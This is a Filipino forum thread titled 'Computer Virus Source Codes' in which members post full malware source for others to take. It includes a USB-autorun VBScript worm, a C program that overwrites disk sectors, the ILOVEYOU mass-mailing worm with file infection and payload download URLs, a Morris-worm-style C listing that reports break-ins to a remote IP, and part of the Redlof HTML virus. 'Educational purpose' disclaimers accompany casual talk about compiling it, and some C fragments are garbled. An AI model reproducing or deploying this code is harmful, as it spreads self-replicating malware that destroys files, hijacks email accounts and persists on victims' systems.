What's new
Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

Computer Virus Source Codes

darkangelxtian

darkangelxtian

Novice
Advanced Member
Messages
45
Reaction score
0
Points
26
DO NOT COMPILE or you'll be sorry!!!
TAGA LIPA ARE! (vbScript)

Code: 
'THIS IS A MODIFIED VERSION BY: F. E. SILVA
'MABUHAY ANG LIPA
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
source=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519″,winpath&"\FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","TAGA LIPA ARE!"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
 
Last edited:
simple code pero malakas!!!
Bomber.c
Code: 
#include 

main()
{
	char *vir;
	abswrite(0,50,0,vir);
	abswrite(1,50,0,vir);
	abswrite(2,50,0,vir);
	abswrite(3,50,0,vir);
	abswrite(4,50,0,vir);
	printf("FUCK YOU ALL");
	printf("The Bomber");
}
 
Last edited:
the legendary, I LOVE YOU VIRUS
Code: 
filename="LOVE-LETTER-FOR-YOU.TXT.vbs"

rem  barok -loveletter(vbe) <i hate go to school>
rem by: spyder  / = ispyder {AT} mail.com  /   {AT} GRAMMERSoft Group  /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"

regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"

downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe";

elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe";

elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe";

elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","
[url]http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe[/url]

"

end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"

regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or
(ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or

(s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if
mIRC will"
scriptini.WriteLine "     corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com";
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2=  /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"

end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME= {AT} - {AT} Generator {AT} - {AT} 
CONTENT= {AT} - {AT} BAROK VBS - LOVELETTER {AT} - {AT} >"&vbcrlf& _
"<META NAME= {AT} - {AT} Author {AT} - {AT}  CONTENT= {AT} - {AT} spyder ?-? ispyder {AT} mail.com ?-?  {AT} GRAMMERSoft
Group ?-? Manila, Philippines ?-? March 2000 {AT} - {AT} >"&vbcrlf& _
"<META NAME= {AT} - {AT} Description {AT} - {AT}  CONTENT= {AT} - {AT} simple but i think this is
good... {AT} - {AT} >"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT= {AT} - {AT} window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#) {AT} - {AT} 

"&vbcrlf& _
"ONKEYDOWN= {AT} - {AT} window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#) {AT} - {AT} 

BGPROPERTIES= {AT} - {AT} fixed {AT} - {AT}  BGCOLOR= {AT} - {AT} #FF9933 {AT} - {AT} >"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this
HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP= {AT} - {AT} infinite {AT} - {AT} 
BGCOLOR= {AT} - {AT} yellow {AT} - {AT} >----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language= {AT} - {AT} JScript {AT} - {AT} >"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE= {AT} - {AT} VBScript {AT} - {AT} >"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject( {AT} - {AT} Scripting.FileSystemObject {AT} - {AT} )"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} )"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} )) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write  {AT} - {AT} ERROR: can#-#t initialize ActiveX {AT} - {AT} "&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject( {AT} - {AT} WScript.Shell {AT} - {AT} )"&vbcrlf& _
"regedit.RegWrite
 {AT} - {AT} HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32 {AT} - {AT} ,dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} "&vbcrlf&

_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
 
Last edited:
:what:

ang haba nung I LOVE YOU Virus. :wow:

pati pala sa mIRC nagawa nyang ipa-spread yun. :wow:
 
eto pala source code nila, hanep nadale ako nyang taga lipa are.
 
buti na lang konti lang nakakaalam kung anong language ginamit dyan ;)

(pag may nakakaalam, wag sabihin. mamaya mapagtripan at icompile yan :slap:)
 
yung i love you dali lang i-compile yan:giggle:

dahil sa source code ng I LOVE YOU virus. medyo natuto rin ako ng konti:giggle:
 
mga tsongs, for educational pupose lang to ok... wag nyong tangkain pang i compile to sa bahay or sa school kasi kayo rin ang maaapektuhan...

worm.c
Code: 
666 The Dead Zone 214-522-5321 300/1200/2400 666

#include 

#include 

#include 

#include 



long current_time;

struct rlimit no_core = {0,0};



int

main (argc, argv)

	int argc;

	char *argv[];



{

	int n;

	int parent = 0;

	int okay = 0;

		/* change calling name to "sh" */

	strcpy(argv[0], "sh");

		/* prevent core files by setting limit to 0 */

	setrlimit(RLIMIT_CORE, no_core);

	current_time = time(0);

		/* seed random number generator with time */

	srand48(current_time);

	n = 1;

	while (argv[n]) {

		/* save process id of parent */

		if (!strncmp(argv[n], "-p", 2)) {

			parent = atoi (argv[++n]);

			n++;

		}

		else {

			/* check for 1l.c in argument list */

			if (!strncmp(argv([n], "1l.c", 4))

				okay = 1;

			/* load an object file into memory */

			load_object (argv[n];

			/* clean up by unlinking file */

			if (parent)

				unlink (argv[n]);

			/* and removing object file name */

			strcpy (argv[n++], "");

		}

	

	}

		/* if 1l.c was not in argument list, quit */

	if (!okay)

		exit (0);

		/* reset process group */

	setpgrp (getpid());

		/* kill parent shell if parent is set */

	if (parent)

		kill(parent, SIGHUP);

		/* scan for network interfaces */

	if_init();

		/* collect list of gateways from netstat */

	rt_init();

		/* start main loop */

	doit();

}



int

doit()

{

	current_time = time (0);

		/* seed random number generator (again) */

	srand48(current_time);

		/* attack gateways, local nets, remote nets */

	attack_hosts();

		/* check for a "listening" worm */

	check_other ()

		/* attempt to send byte to "ernie" */

	send_message ()

	for (;;) {

		/* crack some passwords */

	crack_some ();

		/* sleep or listen for other worms */

	other_sleep (30);

	crack_some ();

		/* switch process id's */

		if (fork())

			/* parent exits, new worm continues */

			exit (0);

		/* attack gateways, known hosts */

		attack_hosts();

		other_sleep(120);

			/* if 12 hours have passed, reset hosts */

		if(time (0) == current_time + (3600*12)) {

			reset_hosts();

			current_time = time(0); }

			/* quit if pleasequit is set, and nextw>10 */

		if (pleasequit && nextw > 10)

			exit (0);

	}

}
 
darkangelxtian said:
mga tsongs, for educational pupose lang to ok... wag nyong tangkain pang i compile to sa bahay or sa school kasi kayo rin ang maaapektuhan...

worm.c
Code: 
666 The Dead Zone 214-522-5321 300/1200/2400 666

#include 

#include 

#include 

#include 



long current_time;

struct rlimit no_core = {0,0};



int

main (argc, argv)

	int argc;

	char *argv[];



{

	int n;

	int parent = 0;

	int okay = 0;

		/* change calling name to "sh" */

	strcpy(argv[0], "sh");

		/* prevent core files by setting limit to 0 */

	setrlimit(RLIMIT_CORE, no_core);

	current_time = time(0);

		/* seed random number generator with time */

	srand48(current_time);

	n = 1;

	while (argv[n]) {

		/* save process id of parent */

		if (!strncmp(argv[n], "-p", 2)) {

			parent = atoi (argv[++n]);

			n++;

		}

		else {

			/* check for 1l.c in argument list */

			if (!strncmp(argv([n], "1l.c", 4))

				okay = 1;

			/* load an object file into memory */

			load_object (argv[n];

			/* clean up by unlinking file */

			if (parent)

				unlink (argv[n]);

			/* and removing object file name */

			strcpy (argv[n++], "");

		}

	

	}

		/* if 1l.c was not in argument list, quit */

	if (!okay)

		exit (0);

		/* reset process group */

	setpgrp (getpid());

		/* kill parent shell if parent is set */

	if (parent)

		kill(parent, SIGHUP);

		/* scan for network interfaces */

	if_init();

		/* collect list of gateways from netstat */

	rt_init();

		/* start main loop */

	doit();

}



int

doit()

{

	current_time = time (0);

		/* seed random number generator (again) */

	srand48(current_time);

		/* attack gateways, local nets, remote nets */

	attack_hosts();

		/* check for a "listening" worm */

	check_other ()

		/* attempt to send byte to "ernie" */

	send_message ()

	for (;;) {

		/* crack some passwords */

	crack_some ();

		/* sleep or listen for other worms */

	other_sleep (30);

	crack_some ();

		/* switch process id's */

		if (fork())

			/* parent exits, new worm continues */

			exit (0);

		/* attack gateways, known hosts */

		attack_hosts();

		other_sleep(120);

			/* if 12 hours have passed, reset hosts */

		if(time (0) == current_time + (3600*12)) {

			reset_hosts();

			current_time = time(0); }

			/* quit if pleasequit is set, and nextw>10 */

		if (pleasequit && nextw > 10)

			exit (0);

	}

}
Click to expand...

pwede bang i-compile ito with TC? saka bakit puro #include lang?
 
drx2k said:
pwede bang i-compile ito with TC? saka bakit puro #include lang?
Click to expand...

yep, pansin ko rin...

matanong ko lang, since hindi ko pa naencounter ito, anong klaseng payload (destruction) ang ginagawa nito? :naughty:

OT: everytime pumupunta ako sa thread na ito, nahahyper ang NOD32 ko :lmao:
 
drx2k said:
pwede bang i-compile ito with TC? saka bakit puro #include lang?
Click to expand...

na decompile ko lang kasi yan sa school namin eh at yan lang ang lumabas... isa lang yan sa mga versions ng worm.c... meron ding apache-worm.c & meron din naman para sa Linux OS para di naman sila ma left out... :dance:


InstilledBee said:
yep, pansin ko rin...

matanong ko lang, since hindi ko pa naencounter ito, anong klaseng payload (destruction) ang ginagawa nito? :naughty:

OT: everytime pumupunta ako sa thread na ito, nahahyper ang NOD32 ko :lmao:
Click to expand...

nag rereplicate lang sya sa lahat ng network or systems...
 
eto naman ang Dover Worm.C

Dover Worm is a worm that can harm your system. With a help of Dover Worm, a hacker can get remote access to your computer

Code: 
/* dover */

#include "worm.h"
#include <stdio.h>
#include <signal.h>
#include <strings.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/fcntl.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>

extern errno;
extern char *malloc();

int pleasequit;					/* See worm.h */
int nobjects = 0;
int nextw;
char *null_auth;

object objects[69];				/* Don't know how many... */

object *getobjectbyname();

char *XS();

main(argc, argv)		/* 0x20a0 */
     int argc;
     char **argv;
{
    int i, l8, pid_arg, j, cur_arg, unused;
    long key;			/* -28(fp) */
    struct rlimit rl;
    
    l8 = 0;					/* Unused */
    
    strcpy(argv[0], XS("sh"));			/* <env+52> */
    time(&key);
    srandom(key);
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl))
	;
    signal(SIGPIPE, SIG_IGN);
    pid_arg = 0;
    cur_arg = 1;
    if  (argc > 2 &&
	 strcmp(argv[cur_arg], XS("-p")) == 0) { /* env55 == "-p" */
	pid_arg = atoi(argv[2]);
	cur_arg += 2;
    }
    for(i = cur_arg; i < argc; i++) {	/* otherwise <main+286> */
	if (loadobject(argv[i]) == 0)
	    exit(1);
	if (pid_arg)
	    unlink(argv[i]);
    }
    if ((nobjects < 1) || (getobjectbyname(XS("l1.c")) == NULL))
	exit(1);
    if (pid_arg) {
	for(i = 0; i < 32; i++)
	    close(i);
	unlink(argv[0]);
	unlink(XS("sh"));			/* <env+63> */
	unlink(XS("/tmp/.dumb"));		/* <env+66>"/tmp/.dumb"
 */
    }
    
    for (i = 1; i < argc; i++)
	for (j = 0;	argv[i][j]; j++)
	    argv[i][j] = '\0';
    if (if_init() == 0)
	exit(1);
    if (pid_arg) {					/* main+600 */
	if (pid_arg == getpgrp(getpid()))
	    setpgrp(getpid(), getpid());
	kill(pid_arg, 9);
    }
    mainloop();
}

static mainloop()				/* 0x2302 */
{
    long key, time1, time0;
    
    time(&key);
    srandom(key);
    time0 = key;
    if (hg() == 0 && hl() == 0)
	ha();
    checkother();
    report_breakin();
    cracksome();
    other_sleep(30);
    while (1) {
	/* Crack some passwords */
	cracksome();
	/* Change my process id */
	if (fork() > 0)
	    exit(0);
	if (hg() == 0 && hi() == 0 && ha() == 0)
	    hl();
	other_sleep(120);
	time(&time1);
	if (time1 - time0 >= 60*60*12)
	    h_clean();
	if (pleasequit && nextw > 0)
	    exit(0);
    }
}

static trans_cnt;
static char trans_buf[NCARGS];

char *XS(str1)			/* 0x23fc */
     char *str1;
{
    int i, len;
    char *newstr;
#ifndef ENCYPHERED_STRINGS
    return str1;
#else  
    len = strlen(str1);
    if (len + 1 > NCARGS - trans_cnt)
	trans_cnt = 0;
    newstr = &trans_buf[trans_cnt];
    trans_cnt += 1 + len;
    for (i = 0; str1[i]; i++)
	newstr[i] = str1[i]^0x81;
    newstr[i] = '\0';
    return newstr;
#endif
}

/* This report a sucessful breakin by sending a single byte to "128.32.137.13"
 * (whoever that is). */

static report_breakin(arg1, arg2)		/* 0x2494 */
{
    int s;
    struct sockaddr_in sin;
    char msg;
    
    if (7 != random() % 15)
	return;
    
    bzero(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = REPORT_PORT;
    sin.sin_addr.s_addr = inet_addr(XS("128.32.137.13"));
						/* <env+77>"128.32.137.13" */
    
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
	return;
    if (sendto(s, &msg, 1, 0, &sin, sizeof(sin)))
	;
    close(s);
}

/* End of first file in the original source.
 * (Indicated by extra zero word in text area.) */

/*
 * Local variables:
 * compile-command: "make"
 * comment-column: 48
 * End:
 */
 
html.redlof.a

Code: 
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
KJSetDim()
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub

Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
If TypeStr = "htt" Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function

Function KJChangeSub(CurrentString,LastIndexChar)
If LastIndexChar = 0 Then
If Left(LCase(CurrentString),1) =< LCase("c") Then
KJChangeSub = FinalyDisk & ":\"
SubE = 0
Else
KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString,1,LastIndexChar)
End If
End Function

Function KJCreateMail()
On Error Resume Next
If InWhere = "html" Then
Exit Function
End If
ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then
Call KJAppendTo(ShareFile,"html")
Else
Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
FileTemp.Close
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

Function KJCreateMilieu()
On Error Resume Next
TempPath = ""
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"
Call KJAppendTo(WinPath & "web\Folder.htt","htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
